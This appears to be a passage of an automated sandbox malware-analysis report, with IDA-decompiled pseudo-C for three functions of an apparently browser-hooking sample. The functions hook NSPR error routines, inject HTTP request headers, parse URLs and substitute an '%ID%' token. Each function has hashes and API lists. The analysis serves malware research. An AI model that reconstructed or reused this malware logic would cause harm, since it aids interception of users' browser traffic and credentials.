Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: AddressProc$CriticalInitializeSection
String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
API String ID: 2804437462-2578621715
Opcode ID: 1cea9706a80ce3628afd462049d1e431d356dff1e8d8d23cfb38f3e6f0b24b54
Instruction ID: 8573bcbb884e94bfd307ccb37d45fac666a37e13d13fd37b9a274453c7d8567b
Opcode Fuzzy Hash: 1cea9706a80ce3628afd462049d1e431d356dff1e8d8d23cfb38f3e6f0b24b54
Instruction Fuzzy Hash: 6701E471D53B189FC720DFAAF80CA06BFA4FB58671F01491BE4048329ADB709400CF81

Uniqueness

Uniqueness Score: -1.00%

Function 012D0CDB Relevance: 12.2, APIs: 8, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012D0CDB(void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed char _v97;
				intOrPtr _v104;
				char _v132;
				char _v140;
				char _v164;
				void* _v168;
				intOrPtr* _v172;
				signed int _t118;
				signed char _t119;
				signed int _t152;

				_v172 = __edx;
				_v168 = __ecx;
				_v8 = _v8 | 0xffffffff;
				if((E012D11E2( &_v84, _v168, __eflags,  *_v172,  *_a4) & 0x000000ff) == 0) {
					L21:
					L012B114A( &_v84);
					return _v8;
				}
				_v88 = L012B132A( &_v84);
				if((_v88 & 0x00000001) == 0) {
					__eflags = _v88 & 0x00000002;
					if((_v88 & 0x00000002) == 0) {
						L17:
						__eflags = _v88 & 0x00000004;
						if(__eflags != 0) {
							 *_v172 = _v48;
							 *_a4 = _v44;
							EnterCriticalSection(0x12dda14);
							_v92 = E012D101C(_v168, __eflags);
							__eflags = _v92 - 0xffffffff;
							if(_v92 != 0xffffffff) {
								L012B1933( *((intOrPtr*)( *0x12dda2c + 8 + _v92 * 0x24)));
								_t118 = _v92 * 0x24;
								__eflags = _t118;
								 *((intOrPtr*)( *0x12dda2c + _t118 + 8)) = _v48;
							}
							LeaveCriticalSection(0x12dda14);
						}
						goto L21;
					}
					_v97 = 1;
					_v96 = _v96 & 0x00000000;
					_t119 = L012B11BD(_v28, _v24);
					__eflags = _t119 & 0x000000ff;
					if((_t119 & 0x000000ff) == 0) {
						L012B165E(0x22,  &_v132);
						HttpAddRequestHeadersA(_v168,  &_v132, 0xffffffff, 0xa0000000);
						L012B165E(0x23,  &_v140);
						HttpAddRequestHeadersA(_v168,  &_v140, 0xffffffff, 0x80000000);
						L012B165E(0x24,  &_v164);
						HttpAddRequestHeadersA(_v168,  &_v164, 0xffffffff, 0x80000000);
					} else {
						_v104 = _v28;
						_v96 = L012B1280( &_v84, _v104);
						__eflags = _v96;
						if(_v96 != 0) {
							_v8 = 1;
						} else {
							_v97 = 0;
						}
					}
					EnterCriticalSection(0x12dda14);
					__eflags = _v97 & 0x000000ff;
					if(__eflags == 0) {
						L12:
						L012B1A64(_v28, _v24);
						__eflags = _v96;
						if(_v96 != 0) {
							L012B17A8(_v96);
						}
						goto L16;
					} else {
						_v92 = E012D101C(_v168, __eflags);
						__eflags = _v92 - 0xffffffff;
						if(_v92 != 0xffffffff) {
							L012B1A64( *((intOrPtr*)( *0x12dda2c + 0xc + _v92 * 0x24)),  *((intOrPtr*)( *0x12dda2c + 0x10 + _v92 * 0x24)));
							L012B1933( *( *0x12dda2c + 0x14 + _v92 * 0x24));
							 *( *0x12dda2c + 0x14 + _v92 * 0x24) =  *( *0x12dda2c + 0x14 + _v92 * 0x24) & 0x00000000;
							 *( *0x12dda2c + 0x1c + _v92 * 0x24) =  *( *0x12dda2c + 0x1c + _v92 * 0x24) & 0x00000000;
							 *( *0x12dda2c + 0x18 + _v92 * 0x24) =  *( *0x12dda2c + 0x18 + _v92 * 0x24) | 0xffffffff;
							 *((intOrPtr*)( *0x12dda2c + 0xc + _v92 * 0x24)) = _v28;
							 *((intOrPtr*)( *0x12dda2c + 0x10 + _v92 * 0x24)) = _v24;
							_t152 = _v92 * 0x24;
							__eflags = _t152;
							 *( *0x12dda2c + _t152 + 0x20) = _v96;
							L16:
							LeaveCriticalSection(0x12dda14);
							goto L17;
						}
						goto L12;
					}
				}
				SetLastError(0x2f78);
				_v8 = _v8 & 0x00000000;
				goto L21;
			}

0x012d0ce4
0x012d0cea
0x012d0cf0
0x012d0d14
0x012d0f67
0x012d0f6a
0x012d0f73
0x012d0f73
0x012d0d22
0x012d0d2b
0x012d0d44
0x012d0d47
0x012d0efa
0x012d0efd
0x012d0f00
0x012d0f0b
0x012d0f13
0x012d0f1a
0x012d0f2b
0x012d0f2e
0x012d0f32
0x012d0f44
0x012d0f4c
0x012d0f4c
0x012d0f58
0x012d0f58
0x012d0f61
0x012d0f61
0x00000000
0x012d0f00
0x012d0d4d
0x012d0d51
0x012d0d5b
0x012d0d63
0x012d0d65
0x012d0d97
0x012d0dad
0x012d0dbd
0x012d0dd6
0x012d0de6
0x012d0dff
0x012d0d67
0x012d0d6a
0x012d0d78
0x012d0d7b
0x012d0d7f
0x012d0d87
0x012d0d81
0x012d0d81
0x012d0d81
0x012d0d8e
0x012d0e0a
0x012d0e14
0x012d0e16
0x012d0e2c
0x012d0e32
0x012d0e37
0x012d0e3b
0x012d0e40
0x012d0e40
0x00000000
0x012d0e18
0x012d0e23
0x012d0e26
0x012d0e2a
0x012d0e69
0x012d0e7e
0x012d0e8f
0x012d0ea0
0x012d0eb1
0x012d0ec5
0x012d0ed8
0x012d0edf
0x012d0edf
0x012d0eeb
0x012d0eef
0x012d0ef4
0x00000000
0x012d0ef4
0x00000000
0x012d0e2a
0x012d0e16
0x012d0d32
0x012d0d38
0x00000000

APIs

SetLastError.KERNEL32(00002F78,?,?), ref: 012D0D32
EnterCriticalSection.KERNEL32(012DDA14), ref: 012D0E0A
LeaveCriticalSection.KERNEL32(012DDA14), ref: 012D0EF4
EnterCriticalSection.KERNEL32(012DDA14,?,?), ref: 012D0F1A
LeaveCriticalSection.KERNEL32(012DDA14), ref: 012D0F61

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ErrorLast
String ID:
API String ID: 486337731-0
Opcode ID: 387055cbdda940f7d51bf8aec0d91b33d2bd735a59b3a3a3aead6c1fff65ae6f
Instruction ID: 14f6e8eeda1291a46fe696749f378928f96bfbc90e34ba7976a10b6d2ba71332
Opcode Fuzzy Hash: 387055cbdda940f7d51bf8aec0d91b33d2bd735a59b3a3a3aead6c1fff65ae6f
Instruction Fuzzy Hash: CD813F30A1424ACFCB24DFE4E995AACBBB1FF58314F208169E516AF294DB70D941CF45

Uniqueness

Uniqueness Score: -1.00%

Function 012CD071 Relevance: 12.1, APIs: 8, Instructions: 107
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012CD071(int __eax, long __ecx, void* __edx) {
				struct HWND__* _v8;
				signed short _v12;
				int _v16;
				long _v20;
				struct tagPOINT _v28;
				intOrPtr _t46;
				int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t63;
				signed int _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				int _t73;
				void* _t74;
				long _t78;
				void* _t79;
				void* _t80;
				intOrPtr _t81;

				_t80 = __edx;
				_t73 = __eax;
				_t78 = __ecx;
				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
				_t46 =  *((intOrPtr*)(_t80 + 0x10));
				_v8 =  *((intOrPtr*)(_t46 + 0x108));
				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
				ReleaseMutex( *(_t80 + 0x14));
				_t50 = GetWindowRect(_v8,  &_v28);
				if(_t50 != 0) {
					if(_v12 != 2) {
						_t51 = _v12 & 0x0000ffff;
						__eflags = _t51 - 0xd;
						if(__eflags > 0) {
							_t52 = _t51 - 0xe;
							__eflags = _t52;
							if(_t52 == 0) {
								_v20 = _t78;
								goto L22;
							} else {
								_t63 = _t52 - 1;
								__eflags = _t63;
								if(_t63 == 0) {
									_v16 = _t73;
								} else {
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_v16 = _t73;
										goto L19;
									} else {
										__eflags = _t64 == 1;
										if(_t64 == 1) {
											goto L16;
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								L11:
								_v28.x = _t78;
								goto L22;
							} else {
								_t67 = _t51;
								__eflags = _t67;
								if(_t67 == 0) {
									goto L11;
								} else {
									_t69 = _t67;
									__eflags = _t69;
									if(_t69 == 0) {
										L16:
										_v16 = _t73;
										goto L17;
									} else {
										_t70 = _t69 - 6;
										__eflags = _t70;
										if(_t70 == 0) {
											L19:
											_v28.x = _t78;
										} else {
											_t71 = _t70 - 1;
											__eflags = _t71;
											if(_t71 == 0) {
												L17:
												_v20 = _t78;
											} else {
												__eflags = _t71 == 1;
												if(_t71 == 1) {
													L22:
													_v28.y = _t73;
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t81 =  *((intOrPtr*)(_t80 + 0x10));
						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
						_v28.x = _v28.x + _t79;
						_v28.y = _v28.y + _t74;
						_v20 = _v20 + _t79;
						_v16 = _v16 + _t74;
					}
					_t50 = IsRectEmpty( &_v28);
					if(_t50 == 0) {
						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
						}
						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
					}
				}
				return _t50;
			}

0x012cd07a
0x012cd081
0x012cd083
0x012cd085
0x012cd08b
0x012cd09e
0x012cd0a1
0x012cd0a4
0x012cd0b1
0x012cd0b9
0x012cd0c4
0x012cd0e3
0x012cd0e7
0x012cd0ea
0x012cd108
0x012cd108
0x012cd10b
0x012cd12b
0x00000000
0x012cd10d
0x012cd10d
0x012cd10d
0x012cd10e
0x012cd126
0x012cd110
0x012cd110
0x012cd110
0x012cd111
0x012cd11e
0x00000000
0x012cd113
0x012cd113
0x012cd114
0x00000000
0x00000000
0x012cd114
0x012cd111
0x012cd10e
0x012cd0ec
0x012cd0ec
0x012cd103
0x012cd103
0x00000000
0x012cd0ee
0x012cd0ef
0x012cd0ef
0x012cd0f0
0x00000000
0x012cd0f2
0x012cd0f3
0x012cd0f3
0x012cd0f4
0x012cd116
0x012cd116
0x00000000
0x012cd0f6
0x012cd0f6
0x012cd0f6
0x012cd0f9
0x012cd121
0x012cd121
0x012cd0fb
0x012cd0fb
0x012cd0fb
0x012cd0fc
0x012cd119
0x012cd119
0x012cd0fe
0x012cd0fe
0x012cd0ff
0x012cd12e
0x012cd12e
0x012cd12e
0x012cd0ff
0x012cd0fc
0x012cd0f9
0x012cd0f4
0x012cd0f0
0x012cd0ec
0x012cd0c6
0x012cd0c6
0x012cd0c9
0x012cd0cf
0x012cd0d5
0x012cd0d8
0x012cd0db
0x012cd0de
0x012cd0de
0x012cd135
0x012cd13d
0x012cd14f
0x012cd163
0x012cd163
0x00000000
0x012cd187
0x012cd13d
0x012cd191

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 012CD085
ReleaseMutex.KERNEL32(?), ref: 012CD0A4
GetWindowRect.USER32 ref: 012CD0B1
IsRectEmpty.USER32(?), ref: 012CD135
GetWindowLongW.USER32(?,000000F0), ref: 012CD144
GetParent.USER32(?), ref: 012CD15A
MapWindowPoints.USER32 ref: 012CD163
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 012CD187

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
String ID:
API String ID: 2634726239-0
Opcode ID: 5536d3843531eb42af8343767700340d31033ee0e91ce2efc55597bee98b2726
Instruction ID: 60af0359127666b684e821cb4aa789408c369385eca47ba72e03820335fd85b8
Opcode Fuzzy Hash: 5536d3843531eb42af8343767700340d31033ee0e91ce2efc55597bee98b2726
Instruction Fuzzy Hash: C3415D71D2020EAFDF219FE8D949ABEBFB4FB44B10F10066EE715A6154D7B09A40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012C4B2F Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 416
timenetworkCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E012C4B2F(char* __ecx, signed int __edx) {
				signed int _t174;
				signed int _t180;
				signed int _t181;
				void* _t188;
				void* _t196;
				signed int _t220;
				signed int _t223;
				signed int _t228;
				signed int _t288;
				intOrPtr* _t295;
				void* _t298;
				signed int _t299;
				intOrPtr _t304;
				void* _t317;
				void* _t320;
				void* _t321;
				signed int _t322;
				signed char _t333;
				signed int _t348;
				signed int _t349;
				void* _t355;
				long _t357;
				signed short* _t360;
				signed int _t362;
				signed short* _t366;
				signed int _t369;
				long _t370;
				void* _t371;
				long _t372;
				signed int _t375;
				void* _t376;
				void* _t378;
				void* _t379;

				_t348 = __edx;
				_t376 = _t378 - 0x6c;
				_t379 = _t378 - 0x500;
				_t174 =  *(_t376 + 0x7c);
				_t357 = 0;
				 *(_t376 + 0x5c) = __edx;
				 *(_t376 + 0x38) = __ecx;
				 *((intOrPtr*)(_t376 + 0x4c)) = 0;
				if(_t174 <= 0) {
					L53:
					asm("sbb eax, eax");
					return  ~0x00000000;
				} else {
					_t295 =  *(_t376 + 0x78) + 0x10;
					 *((intOrPtr*)(_t376 + 0x64)) = _t295;
					 *(_t376 + 0x40) = _t174;
					do {
						_t302 =  *_t295;
						_t179 =  *(_t295 - 0x10) >> 0x0000000a & 0x00000008;
						 *(_t376 + 0x3c) =  *(_t295 - 0x10) >> 0x0000000a & 0x00000008;
						if( *_t295 == _t357) {
							L4:
							_t180 =  *(_t295 + 4);
							_t304 =  *((intOrPtr*)(_t295 + 8)) + _t180;
							 *(_t376 + 0x78) = _t357;
							 *(_t376 + 0x58) = _t357;
							 *((intOrPtr*)(_t376 + 0x34)) = _t304;
							if(_t180 >= _t304) {
								L37:
								_t181 =  *(_t295 - 0x10);
								if((_t181 & 0x00000008) != 0 &&  *(_t376 + 0x78) != _t357) {
									if((_t181 & 0x00000200) == 0) {
										_t348 = _t348 | 0xffffffff;
										_t196 = L012B1596( *(_t376 + 0x38), _t348);
										_t368 = _t196;
										if(_t196 != _t357) {
											_t348 = _t376 - 0x34;
											_t317 = 0xa;
											L012B1479(_t317, _t348);
											_push( *(_t376 + 0x78));
											L012B171C(0xc9, _t368, _t357, _t376 - 0x34, _t368);
											_t379 = _t379 + 0x18;
											L012B1933(_t368);
										}
									} else {
										_t369 = 0x3c;
										_t348 = _t369;
										L012B19F6(_t376 - 0x3c, _t348);
										 *((intOrPtr*)(_t376 - 0x2c)) = _t376 - 0x1ac;
										 *(_t376 - 0x3c) = _t369;
										 *((intOrPtr*)(_t376 - 0x28)) = 0x103;
										if(InternetCrackUrlA( *(_t376 + 0x38), _t357, _t357, _t376 - 0x3c) == 1 &&  *((intOrPtr*)(_t376 - 0x28)) > _t357) {
											GetSystemTime(_t376 + 0x24);
											_t320 = 9;
											L012B1479(_t320, _t376 - 0xa0);
											_push( *(_t376 + 0x2a) & 0x0000ffff);
											_push( *(_t376 + 0x26) & 0x0000ffff);
											_push(( *(_t376 + 0x24) & 0x0000ffff) - 0x7d0);
											L012B1A8C(_t376 - 0x494, 0x104, _t376 - 0xa0, _t376 - 0x1ac);
											_t379 = _t379 + 0x1c;
											_push( *(_t376 + 0x58));
											_push( *(_t376 + 0x78));
											_t348 = 0;
											_push(_t376 - 0x494);
											_t321 = 2;
											L012B1B86(_t321, 0);
										}
									}
									L012B1933( *(_t376 + 0x78));
								}
								if( *(_t295 - 4) != _t357) {
									if(( *(_t295 - 0x10) & 0x00000010) == 0) {
										EnterCriticalSection(0x12dd074);
										L012B1933( *0x12dd08c);
										L012B1933( *0x12dd090);
										_t349 = _t348 | 0xffffffff;
										 *0x12dd08c = L012B12A8( *((intOrPtr*)(_t295 - 0xc)), _t349);
										_t348 = _t349 | 0xffffffff;
										 *0x12dd090 = L012B12A8( *(_t295 - 4), _t348);
										LeaveCriticalSection(0x12dd074);
									} else {
										L012B17C6(1, _t376 - 0x60, _t376 - 0xa4);
										_t188 = L012B1BE0( *(_t295 - 4));
										_t348 =  *(_t295 - 4);
										if(L012B173A(_t376 + 0x14, _t348, _t188) != 0) {
											_push(_t376 - 0xa4);
											_t355 = 0x10;
											L012B11DB(_t376 + 0x14, _t355);
											GetLocalTime(_t376 + 4);
											_t348 = _t376 - 0x60;
											L012B1591(0x80000001, _t348, _t376 - 0xa4, 3, _t376 + 4, 0x10);
										}
									}
								}
								goto L51;
							} else {
								goto L7;
								L11:
								_t223 =  *_t366 & 0x0000ffff;
								if(_t223 != 4) {
									_t37 = _t223 - 4; // -4
									_t348 = _t37;
									if(L012B14BF( &(_t366[2]), _t348,  *( *(_t376 + 0x5c)) +  *(_t376 + 0x7c),  *( *(_t376 + 0x74)) -  *(_t376 + 0x7c), _t376 + 0x60, 0,  *(_t376 + 0x3c)) == 0) {
										goto L35;
									} else {
										if( *( *(_t376 + 0x68)) != 4) {
											 *(_t376 + 0x60) =  *(_t376 + 0x60) +  *(_t376 + 0x7c);
										} else {
											 *(_t376 + 0x7c) =  *(_t376 + 0x60);
										}
										goto L20;
									}
								} else {
									if( *_t322 != _t223) {
										_t288 =  *(_t376 + 0x7c);
									} else {
										_t288 =  *( *(_t376 + 0x74));
									}
									 *(_t376 + 0x60) = _t288;
									L20:
									_t228 =  *(_t376 + 0x60) -  *(_t376 + 0x7c);
									_t333 =  *( *((intOrPtr*)(_t376 + 0x64)) - 0x10);
									_t298 = ( *_t360 & 0x0000ffff) - 4;
									 *(_t376 + 0x68) = _t228;
									if((_t333 & 0x00000004) == 0) {
										if((_t333 & 0x00000008) != 0) {
											_t348 = _t228 + _t298 +  *(_t376 + 0x58) + 2;
											if(L012B1C26(_t376 + 0x78, _t348) != 0) {
												_t370 =  *(_t376 + 0x58);
												if(_t298 != 0) {
													L012B1947( *(_t376 + 0x78) + _t370,  &(_t360[2]), _t298);
													_t370 = _t370 + _t298;
												}
												L012B1947( *(_t376 + 0x78) + _t370,  *( *(_t376 + 0x5c)) +  *(_t376 + 0x7c),  *(_t376 + 0x68));
												if(( *( *((intOrPtr*)(_t376 + 0x64)) - 0x10) & 0x00000100) == 0) {
													_t348 =  *(_t376 + 0x68);
													_t371 = _t370 + L012B13CA(_t370 +  *(_t376 + 0x78), _t348);
												} else {
													_t371 = _t370 +  *(_t376 + 0x68);
												}
												 *((char*)(_t371 +  *(_t376 + 0x78))) = 0xa;
												_t372 = _t371 + 1;
												 *(_t376 + 0x58) = _t372;
												 *((char*)(_t372 +  *(_t376 + 0x78))) = 0;
											}
										}
										L34:
										_t295 =  *((intOrPtr*)(_t376 + 0x64));
										L35:
										if( *(_t376 + 0x44) <  *((intOrPtr*)(_t376 + 0x34))) {
											_t180 =  *(_t376 + 0x44);
											L7:
											_t366 = ( *_t180 & 0x0000ffff) + _t180;
											_t360 = _t366 + ( *_t366 & 0x0000ffff);
											_t322 = _t180;
											 *(_t376 + 0x44) = _t360 + ( *_t360 & 0x0000ffff);
											_t220 =  *_t322 & 0x0000ffff;
											 *(_t376 + 0x68) = _t322;
											 *(_t376 + 0x50) = _t360;
											if(_t220 != 4) {
												goto L9;
											} else {
												 *(_t376 + 0x7c) =  *(_t376 + 0x7c) & 0x00000000;
												goto L11;
											}
										}
										_t357 = 0;
										goto L37;
									}
									_t375 =  *( *(_t376 + 0x74)) - _t228 + _t298;
									_t362 = L012B1C17(_t375);
									if(_t362 == 0) {
										goto L34;
									}
									L012B1947(_t362,  *( *(_t376 + 0x5c)),  *(_t376 + 0x7c));
									L012B1947( *(_t376 + 0x7c) + _t362,  &(( *(_t376 + 0x50))[2]), _t298);
									L012B1947(_t362 + _t298 +  *(_t376 + 0x7c),  *( *(_t376 + 0x5c)) +  *(_t376 + 0x60),  *( *(_t376 + 0x74)) -  *(_t376 + 0x60));
									L012B1933( *( *(_t376 + 0x5c)));
									if(( *( *((intOrPtr*)(_t376 + 0x64)) - 0x10) & 0x00004000) != 0) {
										_push(0);
										 *((intOrPtr*)(_t376 + 0x54)) = 0;
										 *(_t376 + 0x50) = 0;
										_push(_t376 + 0x50);
										_push(_t376 + 0x54);
										_push(_t375);
										_push(_t362);
										_t348 = 4;
										_t299 = _t375;
										L012B14BF(0x12d8a54, _t348);
										if( *((intOrPtr*)(_t376 + 0x54)) > 0) {
											L012B11AE(_t376 - 0x28c);
											_t348 = _t348 | 0xffffffff;
											 *((intOrPtr*)(_t376 + 0x48)) = L012B1195(_t376 - 0x288, _t348);
											_t375 = _t375 + L012B1BE0(_t272) - 4;
											 *(_t376 + 0x68) = L012B1C17(_t375);
											L012B1947(_t274, _t362,  *((intOrPtr*)(_t376 + 0x54)));
											L012B1947( *(_t376 + 0x68) +  *((intOrPtr*)(_t376 + 0x54)),  *((intOrPtr*)(_t376 + 0x48)), L012B1BE0( *((intOrPtr*)(_t376 + 0x48))));
											L012B1947(L012B1BE0( *((intOrPtr*)(_t376 + 0x48))) +  *(_t376 + 0x68) +  *((intOrPtr*)(_t376 + 0x54)),  *(_t376 + 0x50) + _t362, _t299 -  *(_t376 + 0x50));
											L012B1933(_t362);
											_t362 =  *(_t376 + 0x68);
										}
									}
									 *((intOrPtr*)(_t376 + 0x4c)) =  *((intOrPtr*)(_t376 + 0x4c)) + 1;
									 *( *(_t376 + 0x5c)) = _t362;
									 *( *(_t376 + 0x74)) = _t375;
									goto L34;
								}
								L9:
								_t348 = _t220 - 4;
								if(L012B14BF(_t322 + 4, _t348,  *( *(_t376 + 0x5c)),  *( *(_t376 + 0x74)), 0, _t376 + 0x7c,  *(_t376 + 0x3c)) == 0) {
									goto L35;
								} else {
									_t322 =  *(_t376 + 0x68);
									goto L11;
								}
							}
						}
						_t348 =  *( *(_t376 + 0x5c));
						if(L012B18D4(_t302, _t348,  *( *(_t376 + 0x74)), _t179) == 0) {
							goto L51;
						}
						goto L4;
						L51:
						_t295 = _t295 + 0x1c;
						_t170 = _t376 + 0x40;
						 *_t170 =  *(_t376 + 0x40) - 1;
						 *((intOrPtr*)(_t376 + 0x64)) = _t295;
					} while ( *_t170 != 0);
					goto L53;
				}
			}

0x012c4b2f
0x012c4b30
0x012c4b34
0x012c4b3a
0x012c4b3e
0x012c4b40
0x012c4b43
0x012c4b46
0x012c4b4b
0x012c5003
0x012c5009
0x012c5011
0x012c4b51
0x012c4b55
0x012c4b59
0x012c4b5c
0x012c4b5f
0x012c4b62
0x012c4b67
0x012c4b6a
0x012c4b6f
0x012c4b89
0x012c4b89
0x012c4b8f
0x012c4b91
0x012c4b94
0x012c4b97
0x012c4b9c
0x012c4e29
0x012c4e29
0x012c4e2e
0x012c4e42
0x012c4ef3
0x012c4ef6
0x012c4efb
0x012c4eff
0x012c4f03
0x012c4f06
0x012c4f07
0x012c4f0c
0x012c4f1b
0x012c4f20
0x012c4f25
0x012c4f25
0x012c4e48
0x012c4e4a
0x012c4e4b
0x012c4e50
0x012c4e5b
0x012c4e67
0x012c4e6a
0x012c4e7a
0x012c4e8d
0x012c4e9b
0x012c4e9c
0x012c4ea5
0x012c4eaa
0x012c4eb4
0x012c4ecf
0x012c4ed4
0x012c4ed7
0x012c4ee0
0x012c4ee3
0x012c4ee5
0x012c4ee8
0x012c4ee9
0x012c4ee9
0x012c4e7a
0x012c4f2d
0x012c4f2d
0x012c4f35
0x012c4f3f
0x012c4faf
0x012c4fbb
0x012c4fc6
0x012c4fce
0x012c4fd6
0x012c4fde
0x012c4fe7
0x012c4fec
0x012c4f41
0x012c4f4e
0x012c4f56
0x012c4f5b
0x012c4f69
0x012c4f75
0x012c4f78
0x012c4f7c
0x012c4f85
0x012c4f9a
0x012c4fa2
0x012c4fa2
0x012c4f69
0x012c4f3f
0x00000000
0x012c4ba2
0x012c4ba2
0x012c4bf8
0x012c4bf8
0x012c4bfe
0x012c4c25
0x012c4c25
0x012c4c3c
0x00000000
0x012c4c42
0x012c4c49
0x012c4c56
0x012c4c4b
0x012c4c4e
0x012c4c4e
0x00000000
0x012c4c49
0x012c4c00
0x012c4c03
0x012c4c0c
0x012c4c05
0x012c4c08
0x012c4c08
0x012c4c0f
0x012c4c59
0x012c4c62
0x012c4c65
0x012c4c68
0x012c4c6b
0x012c4c71
0x012c4d9e
0x012c4da5
0x012c4db3
0x012c4db5
0x012c4dba
0x012c4dc7
0x012c4dcc
0x012c4dcc
0x012c4de0
0x012c4def
0x012c4df9
0x012c4e04
0x012c4df1
0x012c4df1
0x012c4df1
0x012c4e09
0x012c4e10
0x012c4e11
0x012c4e14
0x012c4e14
0x012c4db3
0x012c4e18
0x012c4e18
0x012c4e1b
0x012c4e21
0x012c4ba4
0x012c4ba7
0x012c4baa
0x012c4baf
0x012c4bb1
0x012c4bb8
0x012c4bbb
0x012c4bbe
0x012c4bc1
0x012c4bc7
0x00000000
0x012c4bc9
0x012c4bc9
0x00000000
0x012c4bc9
0x012c4bc7
0x012c4e27
0x00000000
0x012c4e27
0x012c4c7e
0x012c4c87
0x012c4c8b
0x00000000
0x00000000
0x012c4c9a
0x012c4cad
0x012c4ccb
0x012c4cd5
0x012c4ce4
0x012c4cec
0x012c4ced
0x012c4cf0
0x012c4cf6
0x012c4cfa
0x012c4cfb
0x012c4cfc
0x012c4cff
0x012c4d05
0x012c4d07
0x012c4d10
0x012c4d18
0x012c4d1d
0x012c4d2d
0x012c4d35
0x012c4d43
0x012c4d48
0x012c4d60
0x012c4d7d
0x012c4d84
0x012c4d89
0x012c4d89
0x012c4d10
0x012c4d8f
0x012c4d92
0x012c4d97
0x00000000
0x012c4d97
0x012c4bcf
0x012c4be2
0x012c4bef
0x00000000
0x012c4bf5
0x012c4bf5
0x00000000
0x012c4bf5
0x012c4bef
0x012c4b9c
0x012c4b7a
0x012c4b83
0x00000000
0x00000000
0x00000000
0x012c4ff2
0x012c4ff2
0x012c4ff5
0x012c4ff5
0x012c4ff8
0x012c4ff8
0x00000000
0x012c5002

APIs

InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 012C4E71
GetSystemTime.KERNEL32(?), ref: 012C4E8D
GetLocalTime.KERNEL32(?,?,00000000,?), ref: 012C4F85
EnterCriticalSection.KERNEL32(012DD074), ref: 012C4FAF
LeaveCriticalSection.KERNEL32(012DD074), ref: 012C4FEC

Strings

%ID%, xrefs: 012C4D00

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
